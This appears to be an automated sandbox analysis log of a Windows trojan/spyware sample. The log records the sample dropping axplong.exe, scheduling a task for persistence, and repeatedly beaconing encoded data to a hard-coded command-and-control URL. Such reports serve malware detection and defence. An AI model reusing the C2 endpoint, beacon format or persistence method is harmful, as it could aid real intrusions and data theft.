Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View

IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 1_2_00CEBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

1_2_00CEBD60

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000001.00000002.4188372534.0000000001701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4188372534.0000000001701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php(
Source: axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php0
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php9
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB
Source: axplong.exe, 00000001.00000002.4188372534.0000000001750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpC
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpHost185.215.113.16
Source: axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpJ
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpT
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpU
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpc
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpfer-Encoding:
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpg
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phphp
Source: axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
Source: axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded9
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpv
Source: axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpx
Source: axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpz

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00CE4CF0	1_2_00CE4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00CEE440	1_2_00CEE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D23068	1_2_00D23068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D17D83	1_2_00D17D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D38D70	1_2_00D38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D38D70	1_2_00D38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D38D70	1_2_00D38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D38D70	1_2_00D38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00CE4AF0	1_2_00CE4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D2765B	1_2_00D2765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D22BD0	1_2_00D22BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00CEE440	1_2_00CEE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D2777B	1_2_00D2777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D26F09	1_2_00D26F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D28720	1_2_00D28720

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: String function: 00CF7870 appears 33 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9975253320844687
Source: file.exe	Static PE information: Section: mjqourvh ZLIB complexity 0.9946221847277454
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9975253320844687
Source: axplong.exe.0.dr	Static PE information: Section: mjqourvh ZLIB complexity 0.9946221847277454

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/3@0/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 52%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

